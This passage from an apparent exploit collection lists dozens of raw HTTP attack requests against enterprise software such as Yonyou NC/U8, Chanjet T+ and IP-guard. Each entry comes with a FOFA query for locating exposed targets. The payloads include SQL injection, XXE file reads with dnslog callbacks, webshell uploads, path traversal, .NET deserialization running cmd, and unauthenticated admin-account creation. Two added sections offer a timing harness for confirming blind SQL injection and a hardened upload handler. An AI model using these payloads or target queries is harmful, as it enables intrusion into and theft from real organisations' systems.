GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
Version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
Version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

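Entries 26 through 34 are all time-based blind SQL injection checks: the payload asks SQL Server (waitfor delay) or Oracle (DBMS_PIPE.RECEIVE_MESSAGE) to pause for five seconds, so the only signal a defender running a self-check gets is response time. One slow response is weak evidence, because a busy Java server can stall for five seconds on its own. A sound check measures a benign baseline and the injected request side by side, interleaved over several rounds, and only reports a hit when every injected round pays the full delay on top of the baseline median. The harness below is an added example, not code from the original list or from Yonyou: the transport is pluggable (an urllib one is included for real use; the decision rule is the point), and the placeholder host and URLs are assumptions built from entry 26.

```python
import time
import urllib.request
from statistics import median
from typing import Callable, Dict, List

# Added example: confirm a time-based blind SQLi finding from the list above.
# Placeholder URLs taken from entry 26; "your-ip" is an assumption, not a real host.
BASELINE_URL = "http://your-ip/portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1"
INJECTED_URL = BASELINE_URL + "'waitfor+delay+'0:0:5'--"


def http_timing_transport(timeout: float = 20.0) -> Callable[[str], float]:
    """Return send(url) -> elapsed seconds, backed by urllib.

    Errors are swallowed on purpose: a 500 from a broken query still tells us
    how long the server took, and elapsed time is the only signal here.
    """
    def send(url: str) -> float:
        t0 = time.monotonic()
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                resp.read()
        except Exception:
            pass
        return time.monotonic() - t0
    return send


def confirm_time_based(send: Callable[[str], float], baseline_url: str, injected_url: str,
                       delay: float = 5.0, rounds: int = 3, slack: float = 1.0) -> Dict:
    """Decide whether injected_url reliably adds `delay` seconds over the baseline.

    Rounds are interleaved (baseline, injected, baseline, injected, ...) so a
    load spike hits both sides equally. The finding is confirmed only when
    every injected round takes at least median(baseline) + delay - slack.
    """
    base: List[float] = []
    inj: List[float] = []
    for _ in range(rounds):
        base.append(send(baseline_url))
        inj.append(send(injected_url))
    threshold = median(base) + delay - slack
    confirmed = all(t >= threshold for t in inj)
    return {"confirmed": confirmed, "threshold_s": threshold,
            "baseline_s": base, "injected_s": inj}


if __name__ == "__main__":
    print(confirm_time_based(http_timing_transport(), BASELINE_URL, INJECTED_URL))
```

The same function verifies the Oracle variants in entries 27 and 29 unchanged; only the URL pair differs. Keep `rounds` at three or more on production hosts, and treat a single fast injected round as "not confirmed" rather than averaging it away.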
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8 Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

Then request:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
  <soapenv:Header/>
  <soapenv:Body>
    <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
    </ser:getUserNameById>
  </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

Then request:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

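Entries 24, 28, 35, 48 and 49 are the same defect in five guises: the server stores an upload under a name or path the client controls, so either the extension (s.php, .jsp) or the directory (\webapps\nc_web\..., ./webapps/nc_web/1.jsp) is the attacker's choice, and in 48 and 49 a DontCheckLogin=1 parameter even waives authentication. The snippet below is an added example, not code from any Yonyou product: it shows the naive join that these PoCs rely on next to a hardened handler that keeps only the last path component on either separator, strips trailing spaces and dots (which Windows and some containers silently discard on write, so "x.php " lands as x.php), rejects dot-files and empty stems, decides the type on the last extension against an allow-list, and finally checks that the resolved destination sits directly under the upload root. The sample filenames are constructed from the PoCs above.

```python
import os
import re
from pathlib import Path
from typing import Optional

ALLOWED_EXT = {".pdf", ".jpg", ".jpeg", ".png", ".txt"}

# Constructed sample filenames modelled on the PoCs in this list (not real uploads).
SAMPLE_NAMES = [
    "./webapps/nc_web/1.jsp",       # relative path inside the multipart filename (entry 35)
    "\\webapps\\nc_web\\x.jsp",     # Windows path handed over in a form field (entry 24)
    "s.php",                        # executable type passed straight through (entry 48)
    "x.php ",                       # trailing space: dropped on disk, survives a naive check (entry 49)
    "../../etc/cron.d/job",         # classic traversal
    ".htaccess",                    # dot-file that would reconfigure the web server
    "report.pdf",
    "photo.JPG",
]


def vulnerable_target(upload_root: str, filename: str) -> str:
    """The pattern behind the PoCs: join the client-supplied name as-is."""
    return os.path.normpath(os.path.join(upload_root, filename))


def hardened_target(upload_root: str, filename: str) -> Optional[str]:
    """Return a safe destination under upload_root, or None to reject the upload."""
    root = Path(upload_root).resolve()

    # 1. keep only the last path component, whichever separator the client used
    name = re.split(r"[\\/]", filename)[-1]
    # 2. drop trailing spaces and dots that the filesystem would remove anyway
    name = name.strip().rstrip(". ")
    # 3. reject empty names, dot-files and names without a real stem
    if not name or name.startswith(".") or not Path(name).stem:
        return None
    # 4. type decided on the last extension, case-insensitively, against an allow-list
    if Path(name).suffix.lower() not in ALLOWED_EXT:
        return None
    # 5. the resolved path must be an immediate child of the upload root
    dest = (root / name).resolve()
    if dest.parent != root:
        return None
    return str(dest)


def triage(upload_root: str, names=SAMPLE_NAMES):
    """Map each sample name to (naive destination, hardened destination or None)."""
    return {n: (vulnerable_target(upload_root, n), hardened_target(upload_root, n))
            for n in names}
```

Step 5 is deliberately redundant with step 1; it is the check that still holds if someone later relaxes the name handling. A server-generated storage name (random id plus the allow-listed extension) removes the attacker's influence over the basename entirely and is the better default where the original name need not be preserved.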
50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) social commerce ERP validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

ctfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target. It executes a command that writes the given string into a file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using that Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA:app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetOSpById xmlns="http://tempuri.org/">
<sId>1';waitfor delay '0:0:5'--+</sId>
</GetOSpById>
</soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 privilege bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

